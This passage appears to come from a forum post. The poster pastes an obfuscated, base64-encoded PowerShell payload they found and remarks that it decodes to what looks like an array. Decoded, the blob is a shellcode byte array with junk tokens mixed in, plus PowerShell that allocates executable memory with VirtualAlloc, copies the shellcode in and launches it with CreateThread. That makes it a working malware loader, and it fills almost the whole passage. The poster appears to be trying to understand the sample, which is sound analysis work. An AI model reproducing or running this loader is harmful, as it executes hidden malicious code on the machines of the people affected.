LDB4NjUsMHg0NSwweDc4LDB4NDEsMHg3NSwweDNELDB4ODMsMHhDMSw8I3lxZiM+MHgxMCwweDgwLDB4MzksMHgwMCwweDc1LDwjdG4jPjB4MzUsMHg4QiwweDQ1LDB4Q0MsMHg4QiwweDQwLDB4MjQsMHgwMywweEMzLDB4MzMsMHhEMiwweDUyLDB4NTAsMHg4QiwweEM2LDB4MDMsMHhDMCwweDk5LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDB4MDQsMHg4MywweEM0LDB4MDgsMHg2NiwweDhCLDB4MDAsMHg4QiwweDU1LDB4Q0MsMHg4QiwweDUyLDB4MUMsMHgwMywweEQzLDB4MEYsMHhCNywweEMwLDB4QzEsPCN3dG4jPjB4RTAsMHgwMiwweDAzLDB4RDAsMHg4QiwweDAyLDB4MDMsPCN2dCM+MHhDMywweDg5LDwjaG5lIz4weDQ1LDB4QUMsMHg0Niw8I21lbiM+MHhGRiwweDhELDB4M0MsMHhGRiwweEZGLDB4RkYsMHgwRiwweDg1LDB4RkMsPCNja3ojPjB4RkUsMHhGRiwweEZGLDB4OEIsMHg0NSwweDA4LDB4MDUsMHg0OCwweDBBLDB4MDAsMHgwMCwweDg5LDB4ODUsMHg3QywweEZGLDB4RkYsMHhGRiw8I2lrcSM+MHg4QiwweDg1LDB4N0MsMHhGRiwweEZGLDB4RkYsMHgwNSwweEU0LDB4MDAsMHgwMCw8I3FldiM+MHgwMCwweDg5LDwjeHNiIz4weDg1LDB4NzgsMHhGRiwweEZGLDB4RkYsMHgzMywweERCLDB4MzMsMHhDMCwweDg5LDB4ODUsMHg2NCw8I2FvIz4weEZGLDB4RkYsMHhGRiwweDMzLDB4QzAsMHg4OSwweDg1LDB4NjAsMHhGRiwweEZGLDB4RkYsMHg4RCwweDg1LDB4NzAsMHhGRiwweEZGLDB4RkYsMHg1MCwweDZBLDB4MDEsMHg2QSwweDAwLDB4OEIsMHg4NSwweDdDLDB4RkYsMHhGRiwweEZGLDB4NTAsMHg2OCwweDAyLDB4MDAsMHgwMCwweDgwLDB4RkYsMHg1NSwweEIwLDB4ODUsMHhDMCwweDBGLDB4ODUsMHg4NiwweDAwLDB4MDAsMHgwMCwweDhELDB4ODUsMHg2MCwweEZGLDwjb3ojPjB4RkYsMHhGRiwweDUwLDB4NkEsMHgwMCwweDhELDB4ODUsMHg2QywweEZGLDB4RkYsMHhGRiwweDUwLDB4NkEsMHgwMCwweDhCLDB4ODUsMHg3QywweEZGLDB4RkYsMHhGRiwweDgzLDB4QzAsMHg0MSwweDUwLDB4OEIsMHg4NSwweDcwLDB4RkYsMHhGRiwweEZGLDB4NTAsMHhGRiwweDU1LDB4QUMsMHg4NSwweEMwLDB4NzUsMHg1QywweDgzLDB4QkQsMHg2MCwweEZGLDB4RkYsPCN4ZGUjPjB4RkYsMHg2NCwweDc2LDB4NTMsMHg2QSwweDQwLDB4NjgsMHgwMCwweDMwLDB4MDAsMHgwMCwweDhCLDB4ODUsMHg2MCwweEZGLDB4RkYsMHhGRiwweDUwLDB4NkEsMHgwMCwweEZGLDB4NTUsMHhBOCwweDg5LDB4ODUsMHg2NCwweEZGLDB4RkYsMHhGRiwweDgzLDB4QkQsMHg2NCwweEZGLDB4RkYsPCNjaHEjPjB4RkYsMHgwMCwweDc0LDB4MzEsMHg4RCwweDg1LDB4NjAsMHhGRiwweEZGLDB4RkYsMHg1MCwweDhCLDB4ODUsPCNidSM+MHg2NCwweEZGLDB4RkYsMHhGRiwweDUwLDB4OEQsMHg4NSwweDZDLDwja2YjPjB4RkYsPCN5YWMjPjB4RkYsMHhGRiwweDUwLDB4NkEsMHgwMCwweDhCLDB4ODUsMHg3QywweEZGLDB4RkYsPCN5bCM+MHhGRiwweDgzLDB4QzAsMHg0MSwweDUwLDB4OEIsMHg4NSwweDcwLDwjbXgjPjB4RkYsMHhGRiwweEZGLDB4NTAsMHhGRiwweDU1LDB4QUMsMHg4NSwweEMwLDB4NzUsMHgwMiwweEIzLDB4MDEsMHgzMywweEMwLDB4ODksMHg4NSw8I2huIz4weDcwLDB4RkYsMHhGRiwweEZGLDB4ODQsMHhEQiwweDBGLDwjZHMjPjB4ODUsMHhCOCwweDAwLDB4MDAsMHgwMCwweDMzLDB4QzAsMHg4OSwweDg1LDwjdXUjPjB4NjQsMHhGRiwweEZGLDB4RkYsPCN4byM+MHgzMywweEMwLDB4ODksMHg4NSw8I21uZiM+MHg2MCwweEZGLDB4RkYsMHhGRiwweDhELDB4ODUsMHg3MCwweEZGLDB4RkYsMHhGRiw8I2dkZyM+MHg1MCwweDZBLDB4MDEsMHg2QSwweDAwLDB4OEIsMHg4NSwweDdDLDB4RkYsMHhGRiwweEZGLDB4NTAsMHg2OCwweDAxLDB4MDAsMHgwMCwweDgwLDB4RkYsMHg1NSwweEIwLDB4ODUsMHhDMCwweDBGLDB4ODUsMHg4NiwweDAwLDB4MDAsMHgwMCw8I2d3cSM+MHg4RCwweDg1LDB4NjAsMHhGRiwweEZGLDB4RkYsMHg1MCwweDZBLDB4MDAsMHg4RCwweDg1LDB4NkMsMHhGRiwweEZGLDB4RkYsMHg1MCwweDZBLDB4MDAsMHg4QiwweDg1LDB4N0MsMHhGRiwweEZGLDB4RkYsMHg4MywweEMwLDB4NDEsMHg1MCwweDhCLDB4ODUsMHg3MCwweEZGLDB4RkYsMHhGRiwweDUwLDB4RkYsPCNucmwjPjB4NTUsMHhBQywweDg1LDwjYXMjPjB4QzAsMHg3NSwweDVDLDB4ODMsMHhCRCwweDYwLDB4RkYsMHhGRiwweEZGLDB4NjQsMHg3NiwweDUzLDB4NkEsMHg0MCwweDY4LDB4MDAsMHgzMCwweDAwLDB4MDAsMHg4QiwweDg1LDB4NjAsPCNxciM+MHhGRiwweEZGLDB4RkYsMHg1MCwweDZBLDB4MDAsMHhGRiwweDU1LDB4QTgsMHg4OSwweDg1LDwjZnpxIz4weDY0LDB4RkYsMHhGRiwweEZGLDB4ODMsMHhCRCwweDY0LDB4RkYsMHhGRiwweEZGLDB4MDAsMHg3NCwweDMxLDB4OEQsMHg4NSwweDYwLDB4RkYsMHhGRiwweEZGLDwjbnB1Iz4weDUwLDB4OEIsMHg4NSwweDY0LDB4RkYsMHhGRiwweEZGLDB4NTAsMHg4RCwweDg1LDB4NkMsMHhGRiwweEZGLDB4RkYsMHg1MCwweDZBLDB4MDAsMHg4QiwweDg1LDB4N0MsMHhGRiwweEZGLDB4RkYsMHg4MywweEMwLDB4NDEsMHg1MCwweDhCLDwjZXBwIz4weDg1LDwjcmMjPjB4NzAsMHhGRiwweEZGLDB4RkYsPCNwb2kjPjB4NTAsPCN0ZyM+MHhGRiwweDU1LDB4QUMsPCNzdHQjPjB4ODUsMHhDMCw8I2t3Iz4weDc1LDB4MDIsMHhCMywweDAxLDB4ODQsMHhEQiw8I3NheCM+MHg3NSwweDA1LDwjb21wIz4weDZBLDB4MDAsMHhGRiwweDU1LDB4QTQsMHg4QiwweDg1LDB4N0MsMHhGRiwweEZGLDB4RkYsMHg4QiwweDgwLDwjdHhkIz4weERDLDB4MDAsMHgwMCwweDAwLDB4NTAsMHg4QiwweDg1LDwjYXJnIz4weDdDLDB4RkYsMHhGRiwweEZGLDB4ODMsMHhDMCwweDUyLDB4NTAsMHg4RCwweDg1LDB4MDAsMHhGQSwweEZGLDB4RkYsMHg1MCw8I2NwcCM+MHhGRiwweDk1LDB4NzgsMHhGRiwweEZGLDB4RkYsMHgzMywweEY2LDB4OEQsMHg4RCwweDAwLDB4RkIsMHhGRiwweEZGLDB4ODksMHgzMSwweDQ2LDB4ODMsMHhDMSwweDA0LDB4ODEsMHhGRSwweDAwLDB4MDEsMHgwMCwweDAwLDB4NzUsMHhGMiwweDMzLDB4REIsMHgzMywweEY2LDB4OEQsMHg4RCwweDAwLDB4RkIsMHhGRiwweEZGLDwjYXhqIz4weDAzLDB4MTksPCN2cW0jPjB4OEIsMHg4NSwweDdDLDB4RkYsMHhGRiwweEZGLDB4RkYsMHhCMCwweERDLDB4MDAsMHgwMCwweDAwLDB4OEIsMHhDNiw8I3dydiM+MHg1QSwweDhCLDB4RkEsMHgzMywweEQyLDB4RjcsMHhGNywweDMzLDB4QzAsMHg4QSwweDg0LDB4MTUsMHgwMCwweEZBLDB4RkYsMHhGRiwweDAzLDB4RDgsMHg4MSwweEUzLDB4RkYsMHgwMCwweDAwLDB4MDAsMHg4QSwweDAxLDwjb25uIz4weDhCLDB4OTQsMHg5RCwweDAwLDB4RkIsMHhGRiwweEZGLDB4ODksMHgxMSwweDI1LDB4RkYsMHgwMCwweDAwLDB4MDAsMHg4OSwweDg0LDB4OUQsMHgwMCwweEZCLDB4RkYsMHhGRiwweDQ2LDB4ODMsMHhDMSw8I3pxIz4weDA0LDB4ODEsMHhGRSwweDAwLDB4MDEsMHgwMCwweDAwLDB4NzUsMHhCNSw8I3pqYiM+MHgzMywweERCLDB4MzMsMHhGRiw8I3hncCM+MHg2QSwweDQwLDB4NjgsMHgwMCwweDMwLDB4MDAsMHgwMCwweDhCLDwjZG4jPjB4ODUsPCNvbyM+MHg2MCwweEZGLDB4RkYsMHhGRiwweDUwLDB4NkEsPCNienEjPjB4MDAsMHhGRiw8I2F0byM+MHg1NSw8I3R1Iz4weEE4LDB4ODksMHg4NSwweDVDLDB4RkYsMHhGRiwweEZGLDB4ODMsMHhCRCwweDVDLDB4RkYsPCNrayM+MHhGRiwweEZGLDB4MDAsMHg3NCwweDI5LDB4OEIsMHg4NSw8I3lucCM+MHg1QywweEZGLDB4RkYsMHhGRiwweDg5LDB4ODUsPCN0dHAjPjB4NEMsMHhGRiwweEZGLDB4RkYsMHg4QiwweDg1LDB4NjAsMHhGRiwweEZGLDB4RkYsMHg1MCwweDhCLDB4ODUsMHg2NCwweEZGLDB4RkYsMHhGRiwweDUwLDB4OEIsMHg4NSw8I2JiayM+MHg0QywweEZGLDB4RkYsMHhGRiwweDUwLDB4RkYsMHg5NSwweDc4LDB4RkYsMHhGRiwweEZGLDB4RUIsMHgwNSwweDZBLDB4MDAsMHhGRiwweDU1LDB4QTQsMHg4QiwweDg1LDB4NjAsMHhGRiw8I2RkdiM+MHhGRiwweEZGLDB4NDgsMHg4NSwweEMwLDB4NzIsMHg3NCwweDQwLDB4ODksMHg4NSwweDNDLDB4RkYsMHhGRiwweEZGLDB4MzMsMHhGNiwweDQzLDB4ODEsMHhFMywweEZGLDB4MDAsMHgwMCwweDAwLDB4MDMsMHhCQywweDlELDB4MDAsMHhGQiwweEZGLDB4RkYsMHg4MSwweEU3LDB4RkYsMHgwMCwweDAwLDB4MDAsMHg4QSwweDg0LDB4OUQsMHgwMCwweEZCLDB4RkYsMHhGRiwweDhCLDB4OTQsMHhCRCwweDAwLDB4RkIsMHhGRiw8I3VwbiM+MHhGRiwweDg5LDB4OTQsMHg5RCwweDAwLDB4RkIsMHhGRiwweEZGLDB4MjUsPCN4cmYjPjB4RkYsMHgwMCwweDAwLDB4MDAsMHg4OSwweDg0LDB4QkQsMHgwMCwweEZCLDB4RkYsMHhGRiwweDhCLDB4ODUsMHg0QywweEZGLDB4RkYsMHhGRiwweDhBLDB4MDQsMHgzMCwweDhCLDB4OTQsMHg5RCwweDAwLDwjY3JmIz4weEZCLDB4RkYsMHhGRiwweDAzLDB4OTQsMHhCRCwweDAwLDB4RkIsMHhGRiwweEZGLDB4ODEsMHhFMiwweEZGLDB4MDAsMHgwMCwweDAwLDwjb2EjPjB4MzIsMHg4NCwweDk1LDB4MDAsMHhGQiwweEZGLDB4RkYsMHg4QiwweDk1LDB4NEMsMHhGRiwweEZGLDB4RkYsMHg4OCwweDA0LDB4MzIsMHg0Niw8I3N1dSM+MHhGRiwweDhELDB4M0MsMHhGRiwweEZGLDB4RkYsMHg3NSwweDk1LDB4OEIsMHg4NSw8I3R4Iz4weDRDLDB4RkYsMHhGRiwweEZGLDB4ODksMHg0NSwweEQ0LDB4OEIsMHg0NSwweEQ0LDB4NjYsMHg4MSwweDM4LDB4NEQsMHg1QSwweDBGLDB4ODUsMHhEQSwweDAyLDB4MDAsMHgwMCwweDhCLDB4NDUsPCN5biM+MHhENCwweDhCLDB4NDAsMHgzQywweDAzLDB4ODUsMHg0QywweEZGLDB4RkYsMHhGRiwweDg5LDB4NDUsMHhEMCwweDhCLDB4NDUsMHhEMCwweDgxLDB4MzgsMHg1MCwweDQ1LDB4MDAsMHgwMCwweDBGLDB4ODUsMHhCQyw8I3Z5Iz4weDAyLDB4MDAsMHgwMCwweDhCLDB4NDUsMHhEMCwweDhCLDB4NTgsMHg1MCwweDAzLDB4REIsMHg2QSwweDQwLDwjbHYjPjB4NjgsMHgwMCwweDMwLDB4MDAsMHgwMCw8I2RsZiM+MHg1Myw8I2ZydSM+MHg2QSw8I2FyIz4weDAwLDB4RkYsMHg1NSwweEE4LDB4ODksMHg0NSwweEY4LDB4ODMsMHg3RCwweEY4LDB4MDAsMHgwRiwweDg0LDB4OUEsMHgwMiwweDAwLDB4MDAsMHg4QiwweDQ1LDB4RDAsMHg4QiwweDQwLDB4NTQsMHg1MCwweDhCLDwjc3AjPjB4ODUsPCNsdGIjPjB4NEMsMHhGRiwweEZGLDB4RkYsMHg1MCwweDhCLDB4NDUsMHhGOCw8I2xmbCM+MHg1MCwweEZGLDB4OTUsMHg3OCwweEZGLDB4RkYsMHhGRiwweDZBLDB4MDQsMHg4QiwweDg1LDB4N0MsMHhGRiwweEZGLDB4RkYsMHgwNSwweEUwLDB4MDAsMHgwMCwweDAwLDB4NTAsMHg4QiwweDQ1LDB4RDAsMHg4QiwweDQwLDB4NTAsMHgwMywweDQ1LDB4RjgsMHg1MCwweEZGLDB4OTUsMHg3OCwweEZGLDB4RkYsMHhGRiwweDhCLDB4ODUsMHg3QywweEZGLDB4RkYsMHhGRiwweDhCLDB4ODAsMHhFMCwweDAwLDB4MDAsMHgwMCwweDUwLDB4OEIsMHg4NSwweDRDLDB4RkYsMHhGRiw8I3JwbyM+MHhGRiwweDUwLDB4OEIsMHg0NSwweEQwLDB4OEIsMHg0MCwweDUwLDB4MDMsMHg0NSwweEY4LDB4ODMsMHhDMCwweDA0LDB4NTAsMHhGRiwweDk1LDB4NzgsMHhGRiwweEZGLDB4RkYsMHg2QSwweDYwLDB4OEIsMHg4NSwweDdDLDB4RkYsMHhGRiwweEZGLDB4ODMsMHhDMCwweDdBLDB4NTAsMHg4QiwweDQ1LDB4RDAsMHg4Qiw8I2ltbSM+MHg0MCwweDUwLDB4MDMsMHg0NSwweEY4LDB4ODMsMHhDMCwweDA0LDB4OEIsPCN3Zm0jPjB4OTUsMHg3QywweEZGLDB4RkYsMHhGRiwweDAzLDB4ODIsMHhFMCwweDAwLDB4MDAsMHgwMCwweDUwLDwjcGojPjB4RkYsMHg5NSwweDc4LDB4RkYsMHhGRiwweEZGLDB4OEIsMHg0NSwweEQwLDB4MEYsMHhCNywweDQwLDB4MDYsMHg0OCwweDg1LDB4QzAsMHg3QywweDVGLDB4NDAsMHg4OSw8I25vdCM+MHg4NSwweDNDLDB4RkYsMHhGRiwweEZGLDB4MzMsMHhGNiw8I3F2Iz4weDhCLDB4NTUsMHhENCwweDhCLDB4NTIsMHgzQywweDhCLDB4ODUsMHg0QywweEZGLDB4RkYsMHhGRiwweDAzLDB4RDAsMHg4MSwweEMyLDB4RjgsPCN5eGcjPjB4MDAsMHgwMCwweDAwLDB4OEIsMHhDRSwweEMxLDB4RTEsMHgwMywweDhELDwjeGUjPjB4MEMsMHg4OSwweDAzLDwjdnptIz4weEQxLDB4ODksMHg5NSwweDUwLDB4RkYsMHhGRiw8I2hraSM+MHhGRiwweDhCLDB4OTUsMHg1MCwweEZGLDB4RkYsMHhGRiwweDhCLDB4NTIsMHgxMCwweDUyLDB4OEIsMHg5NSwweDUwLDB4RkYsMHhGRiwweEZGLDB4OEIsMHg1MiwweDE0LDB4MDMsMHhEMCwweDUyLDB4OEIsMHg4NSwweDUwLDB4RkYsMHhGRiwweEZGLDB4OEIsPCNnayM+MHg0MCwweDBDLDB4MDMsMHg0NSwweEY4LDB4NTAsMHhGRiwweDk1LDB4NzgsMHhGRiw8I3pjaSM+MHhGRiwweEZGLDB4NDYsMHhGRiwweDhELDB4M0MsMHhGRiwweEZGLDB4RkYsMHg3NSwweEFBLDB4OEIsMHg0NSwweEQwLDB4OEIsMHg0MCw8I3JpIz4weDM0LDwjc3NmIz4weDNCLDB4NDUsMHhGOCwweDBGLDB4ODQsPCN2bSM+MHhDQiwweDAwLDwjbnMjPjB4MDAsMHgwMCwweDhCLDwjcXZtIz4weDQ1LDB4RDAsMHg4QiwweDU1LDB4RjgsMHgyQiwweDUwLDB4MzQsMHg4OSwweDU1LDB4RDgsMHg4QiwweDQ1LDB4RjgsMHg4OSwweDQ1LDB4RjAsMHg4QiwweDQ1LDB4RDAsMHg4MywweEI4LDB4QTQsPCNvZiM+MHgwMCwweDAwLDwjeWsjPjB4MDAsMHgwMCwweDBGLDB4ODYsMHg4NywweDAwLDB4MDAsPCN2YSM+MHgwMCwweDhCLDB4NDUsMHhEMCwweDhCLDB4ODAsMHhBMCw8I214Iz4weDAwLDB4MDAsMHgwMCwweDAzLDB4NDUsMHhGMCwweDg5LDwjbGt1Iz4weDQ1LDB4RUMsMHhFQiwweDZFLDB4OEIsMHg0NSwweEVDLDB4OEIsMHgwMCwweDAzLDB4NDUsMHhGMCwweDg5LDB4NDUsMHhFOCwweDhCLDB4NDUsMHhFQywweDgzLDB4QzAsMHgwOCwweDg5LDB4NDUsPCNpdHAjPjB4RTQsPCN2ZiM+MHg4QiwweDQ1LDB4RUMsMHg4QiwweDQwLDB4MDQsMHg4MywweEU4LDB4MDgsMHhEMSwweEU4LDB4NDgsMHg4NSwweEMwLDB4NzIsMHgzRSwweDQwLDB4ODksMHg4NSwweDNDLDB4RkYsMHhGRiwweEZGLDB4OEIsMHg0NSwweEU0LDB4NjYsMHg4QiwweDEwLDB4MEYsMHhCNywweEMyLDB4QzEsMHhFOCwweDBDLDB4OEIsMHhDQSwweDY2LDwjcXYjPjB4ODEsMHhFMSwweEZGLDB4MEYsMHgwRiwweEI3LDB4QzksMHg4MywweEY4LDB4MDMsMHg3NSwweDEwLDB4OEIsMHg0NSwweEU4LDB4MDMsMHhDMSwweDg5LDB4NDUsMHhFMCwweDhCLDB4NDUsMHhFMCwweDhCLDB4NTUsMHhEOCwweDAxLDB4MTAsMHg4MywweDQ1LDB4RTQsMHgwMiwweEZGLDB4OEQsMHgzQywweEZGLDB4RkYsPCNzdyM+MHhGRiw8I3ZqIz4weDc1LDB4QzksMHg4QiwweDQ1LDB4RUMsMHg4QiwweDQwLDB4MDQsMHgwMywweDQ1LDwjaXQjPjB4RUMsMHg4OSw8I2lreCM+MHg0NSw8I2lyeCM+MHhFQywweDhCLDB4NDUsMHhFQywweDgzLDB4MzgsMHgwMCwweDc3LDB4OEEsMHg4QiwweDQ1LDB4RDAsMHg4QiwweDU1LDB4RjgsMHg4OSwweDUwLDB4MzQsMHg2OCwweEY4LDB4MDAsMHgwMCwweDAwLDB4OEIsPCN5aWEjPjB4NDUsPCNuZ2cjPjB4RDAsMHg1MCwweDhCLDB4NDUsMHhENCwweDhCLDB4NDAsMHgzQywweDAzLDB4NDUsMHhGOCwweDUwLDB4RkYsPCNsdyM+MHg5NSwweDc4LDB4RkYsMHhGRiwweEZGLDB4OEIsMHg0NSwweEQwLDB4MDUsMHg4MCwweDAwLDB4MDAsMHgwMCwweDg5LDB4NDUsPCNlZXUjPjB4OTAsMHg4QiwweDQ1LDB4OTAsMHg4MywweDc4LDB4MDQsMHgwMCwweDBGLDwjZWJ0Iz4weDg2LDB4OUUsMHgwMCw8I2NmIz4weDAwLDwjaXV1Iz4weDAwLDB4OEIsMHg0NSw8I2l1Iz4weEQwLDB4OEIsMHg4MCwweDgwLDwjc2cjPjB4MDAsMHgwMCw8I3RhdiM+MHgwMCwweDAzLDB4NDUsMHhGOCwweDg5LDB4NDUsMHg4QywweEVCLDB4N0YsMHgwMyw8I2thZSM+MHg3RCwweEY4LDB4NTcsMHhGRiwweDU1LDB4QkMsMHg4QiwweEQ4LDB4ODUsMHhEQiwweDc0LDB4NzIsMHg4QiwweDQ1LDB4OEMsMHg4MywweDM4LDB4MDAsMHg3NCwweDBELDB4OEIsMHg0NSwweDhDLDB4OEIsMHgwMCw8I2RhIz4weDAzLDB4NDUsMHhGOCwweDg5LDB4NDUsMHg4OCwweEVCLDB4MEMsMHg4QiwweDQ1LDB4OEMsMHg4QiwweDQwLDB4MTAsMHgwMywweDQ1LDB4RjgsMHg4OSwweDQ1LDB4ODgsMHg4QiwweDQ1LDB4OEMsMHg4Qiw8I2xvIz4weDQwLDB4MTAsMHgwMywweDQ1LDB4RjgsMHg4OSwweDQ1LDB4ODQsMHhFQiwweDM3LDB4OEIsMHg0NSwweDg4LDwjdXQjPjB4OEIsMHgzMCw8I2V5dCM+MHhGNywweEM2LDB4MDAsMHgwMCwweDAwLDB4ODAsMHg3NCwweDEyLDB4ODEsMHhFNiw8I3J1byM+MHhGRiwweEZGLDB4MDAsMHgwMCwweDU2LDB4NTMsMHhGRiwweDU1LDB4QjgsMHg4QiwweDU1LDB4ODQsMHg4OSwweDAyLDwjc2cjPjB4RUIsMHgxMCwweDAzLDB4NzUsMHhGOCwweDgzLDB4QzYsMHgwMiwweDU2LDB4NTMsMHhGRiwweDU1LDB4QjgsMHg4QiwweDU1LDB4ODQsMHg4OSwweDAyLDwjbmkjPjB4ODMsMHg0NSwweDg4LDwjZWIjPjB4MDQsMHg4Myw8I2ZwYSM+MHg0NSw8I3phIz4weDg0LDB4MDQsMHg4QiwweDQ1LDB4ODgsMHg4Myw8I2V6cSM+MHgzOCwweDAwLDB4NzUsMHhDMSwweDgzLDB4NDUsMHg4QywweDE0LDB4OEIsMHg0NSwweDhDLDB4OEIsMHg3OCwweDBDLDB4ODUsMHhGRiwweDBGLDB4ODUsMHg3MywweEZGLDB4RkYsMHhGRiwweDhCLDB4NDUsMHhEMCw8I2Z5dyM+MHg4QiwweDQwLDB4MjgsMHgwMywweDQ1LDB4RjgsMHg4OSwweDQ1LDB4RjQsMHgzMSwweEMwLDB4NTAsMHg2QSwweDAxLDB4RkYsMHg3NSwweEY4LDB4RkYsMHg1NSwweEY0LDwjdmFnIz4weDZBLDB4MDAsPCNob3ojPjB4RkYsMHg1NSwweEE0LDwjbXJpIz4weDVGLDB4NUUsPCNxYiM+MHg1QiwweDhCLDB4RTUsMHg1RCwweEMyLDB4MDQsPCNzaCM+MHgwMCwweDhELDB4NDAsPCNtcHgjPjB4MDAsMHg3MywweDZGLDB4NjYsMHg3NCwweDc3LDB4NjEsMHg3MiwweDY1LDB4NUMsPCN5dGwjPjB4MzcsPCN6a2YjPjB4NDcsMHg1NywweDczLDB4NjEsMHg0MSwweDY1LDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDwjZ2NhIz4weDAwLDB4MDAsMHgwMCw8I3J6Iz4weDAwLDB4MDAsMHgwMCw8I25vIz4weDAwLDB4MDAsMHgwMCw8I2RmZCM+MHgwMCwweDAwLDB4MDAsMHgwMCwweDQ3LDB4NzMsMHg0NCwweDc5LDB4NzEsMHg3NCwweDU1LDB4MzYsMHg3MSwweDZFLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHg3Miw8I3FmciM+MHg4MiwweDk3LDB4NDYsMHhFNCwweDFCLDB4RjIsMHhBQiwweEQ5LDB4MDAsMHgwQSwweDk3LDB4ODIsMHgyNSwweDVGLDB4RTQsMHg5OSwweDVELDB4QjYsMHg4RSwweDczLDB4MjMsMHg0NiwweDdBLDB4OTIsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHg3MywweDAwLDB4NjgsMHgwMCwweDY1LDwjanUjPjB4MDAsMHg2QywweDAwLDB4NkMsMHgwMCwweDNDLDB4MDAsMHgzQyw8I2F3cyM+MHgwMCwweDNBLDB4MDAsMHgzQSwweDAwLDwjYmZ3Iz4weDNFLDB4MDAsMHgzRSwweDAwLDwjanAjPjB4NzMsMHgwMCwweDY4LDB4MDAsMHg2NSwweDAwLDB4NkMsMHgwMCwweDZDLDB4MDAsMHg2MiwweDAwLDwjYWQjPjB4NzAsMHgwMCwweDczLDB4MDAsMHgzQSwweDAwLDB4M0EsMHgwMCwweDYyLDB4MDAsMHg3MCwweDAwLDB4NzMsMHgwMCwweDZFLDB4MDAsMHg3NSwweDAwLDB4NkQsMHgwMCwweDNBLDB4MDAsMHgzOCwweDAwLDB4MzYsMHgwMCwweDM0LDB4MDAsPCN2eSM+MHgzQSwweDAwLDB4NkUsMHgwMCwweDc1LDwjemtnIz4weDAwLDB4NkQsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDwjd2NtIz4weDAwLDB4MDAsPCNreCM+MHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDE5LDB4MDAsMHgwMCwweDAwLDB4MDAsMHhBQSwweDA2LDB4MDAsPCNhZSM+MHg1NSwweDhCLDB4RUMsMHg2MCwweDhCLDB4N0QsMHgwOCwweDhCLDB4NzUsMHgwQywweDhCLDB4NEQsMHgxMCwweEYzLDB4QTQsMHg2MSwweDVELDB4QzIsMHgwQywweDAwLDwjYmgjPjB4RDYsMHgyNywweEQxLDB4NTgsMHgwMCwweEEwLDB4NjYsMHgzNywweDEzLDB4OTksMHg0NCwweDgyLDB4MzYsMHgwMiwweENGLDB4ODIsMHg1OCwweENBLDB4MEIsMHg3OCwweDY0LDB4QjIsMHhGNywweDk5LDB4MkQsMHg2NCwweEE3LDwjbmZ2Iz4weEFCLDB4NUYsMHgwRCwweDlCLDB4RkIsMHg0NSwweEMyLDB4MkIsMHhBQywweDMzLDwjZHhnIz4weDU1LDB4MTMsMHg4RSwweENDLDB4NjYsMHg2MywweDEyLDB4OTcsMHhFRCwweDZBLDB4RkUsMHg3RSwweDcxLDwjYXkjPjB4NUIsMHhFRCw8I2Z2Iz4weDJGLDB4QTQsMHhDNSw8I29uZyM+MHhDNywweDhFLDB4MzgsMHgyNSwweEM5LDB4OTcsMHgwNCw8I3R5Iz4weDE2LDB4QjQsMHg2NywweERELDB4RkEsMHg0MiwweDRGLDB4QkUsPCN3cCM+MHgyMCwweDAxLDB4MkQ7DQojZWJmdnhrZmZ2bA0KJHByPShbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZ3Byb2Mga2VybmVsMzIuZGxsIFZpcnR1YWxBbGxvYyksKGdkZWxlZ2F0ZSBAKFtJbnRQdHJdLFtVSW50MzJdLFtVSW50MzJdLFtVSW50MzJdKSAoW1VJbnQzMl0pKSkpLkludm9rZSgwLCRzYzMyLkxlbmd0aCwweDMwMDAsMHg0MCk7DQojemZnZA0KaWYoJHByIC1uZSAwKXskbWVtc2V0PShbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZ3Byb2MgbXN2Y3J0LmRsbCBtZW1zZXQpLChnZGVsZWdhdGUgQChbVUludDMyXSxbVUludDMyXSxbVUludDMyXSkgKFtJbnRQdHJdKSkpKTsNCiNwaGp5bnp6b3F4DQpmb3IgKCRpPTA7JGkgLWxlICgkc2MzMi5MZW5ndGgtMSk7JGkrKykgeyRtZW1zZXQuSW52b2tlKCgkcHIrJGkpLCAkc2MzMlskaV0sIDEpfTsNCiNsdnl0amoNCihbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZ3Byb2Mga2VybmVsMzIuZGxsIENyZWF0ZVRocmVhZCksKGdkZWxlZ2F0ZSBAKFtJbnRQdHJdLFtVSW50MzJdLFtVSW50MzJdLFtVSW50MzJdLFtVSW50MzJdLFtJbnRQdHJdKSAoW0ludFB0cl0pKSkpLkludm9rZSgwLDAsJHByLCRwciwwLDApOw0KI3BqcXR0dHpwDQp9c2xlZXAoMTIwMCk7fWNhdGNoe31leGl0Ow0KI3VzcnVjdw0KI290bGJsb2FiDQo=')))<\/pre>\n
which when you decode the base64, you get the following (which looks to be an array perhaps):<\/p>\n
